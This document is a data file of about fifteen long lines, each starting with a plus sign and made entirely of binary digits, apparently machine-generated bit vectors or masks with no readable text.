+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000001100000000000000000000100100000000000000000000000000000100010000000010001001000000001000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000001000000000000000000010000000000000000000000000000000000001001000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000011101011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000010000000000000000001000000000000000100000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000100100000100001000000000000000000000001100000000000000000000000000000000100000010101010000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000001110100010100001111111111111111111111111111111111111111111111111 +111100000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000000000000000000000000000000000000000000000001000000000010001000100000000000000000000000000000000000000010000000000000000000100000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111101100010011111111111111111111111111111111111111111111111111 +111110000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000001100000000000000000000100000001001100100000110001001000100000000000000000000000000110011000011010010000000000000000000001110000000111100000000110111100101110010001111011000001001001110100100111111110001111111100101110010000110001000000000001110000000111100000000110100100101100000000110000000000000011111000000111100000001110111100000100010000110000000000000000000000000000000000000000000000000000000000000000000001000010010110011111111111111111111111111111111111111111111111111 +111100000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000010000000010000000000101010000000000000000000000000000000000000000010100000000000000000000000000000000000001000000000000000000010010000000010000000000000000000000000101000000001010000000010001000000000000000010000000000000000001000000000000000000000000000000000000000000000000100000000001000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000001101000000100110111111111111111111111111111111111111111111111111 +111110000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000010000000000010000000000100000000000000000000010000000000000001000000000000000000000010100000000100000000010000000110100000100001001010010000000010101010000100010100000100000110011000100000000000000000000010100000000100000000010000000110011000000000001000000000000010100000000100000000000100000110010000001000001000000000000000000000000000000000000000000000000000000000000000000001011001100110001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000010010000100000000000000000000000100000000100100000000100000010010000100000001000000000000000000000000100100010001010000010000000100001100000000000000000010000000100100000000100000000010000000001000000000000000000000000000100100000001100000010000000000001000000000000000000000000000000000000000000000000000000000000000000000001010001001110000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000010110000000000000100000000000000000000000100000000100100000000000001010110110010001000000010000000000000000000111100000000110100100000011111000000000000001100000100111100001111110001111000100000111110000100000000001100001100100100111110010000110100100000101101001100000000000000000000011000111110010000110100100000001100000000000000000000000000000000000000000000000000000000000000000000000000001110011110010111111111111111111111111111111111111111111111111111 +111100000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000100000000000000000000000000001000000000000000000000000000000000000000100000000000000000000000000000000000000000000001000000000010000000001001000000000000000001000100000000000001000000000000100000000000000000000000000000000010000000000000000000000010100000100000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000110101101101110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000010000000000000000000000000000000000000000000000000000000110000100000010000000000000000000000000001000000010000000110000001000000000000000000000000000000110000110100000010000000000000100100000000000000000101000000110001000100010000000110010000000001000000000000000000000000000001001000010000000110000000000100000000000000000000000000000000000000000000000000000000000000000000000001100000001011100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000001010000000000000000000000100000000000100000000000000000000100100000000100000000000001100000000000000001000001000000011000000010001010000101000000100000000000000000000000001000000100100010000100000000000001000000000000000000000000000000010100100000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101010001000011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000011000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000011000000111100010001111000000000000001100000000011000000010011000000001000100000011000000001100000110000000111100010001111000000111111110001111000000010010001111000000111110010001111000100111111110001111000000000000001111000000111110010001111000001111111110001111000000000000000110001000100100000001111000000111111110001100000000000000000000000000000000000000000000000000001100000000000000000001000001111110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000001001000001000000000001000000000000000000010000000100000000100000000000000000010001000000000000001000000000001000000000001000000000100000001001000000000000000010000000001000000100001000000000100000001001000000000000000010000000001000000000001000000000100100001010000000000000000000000000000000000000001000000000100000001000000000000000000000000000000000000000000000000000000000001000000000000000100110010001011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100001000011000000000000000010000001000000000000000000000000100000000000000000000000010000000000100000001000010000001001000101100010000000000101000100000000100001000000010000000001000101100010000000000000000100000000100001000000010000000001000101100100000000000000010000000000100000000000010000000001000101100010000000000000000000000000000000000000000000000000010000000000000000000111111101110111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000100000000000000000000000000000000000000000000000000000000000000010000000001000000100000000100100000001010000000001000000001010000000000000001010000000100100000001010001000100100000001010000000000000001010000000100100100001010000000000000000001010000000000000000100000010100000000001010000000001100000001000000000000000000000000000000000000000000000000000000000000000000000001000001000000010111111111111111111111111111111111111111111111111 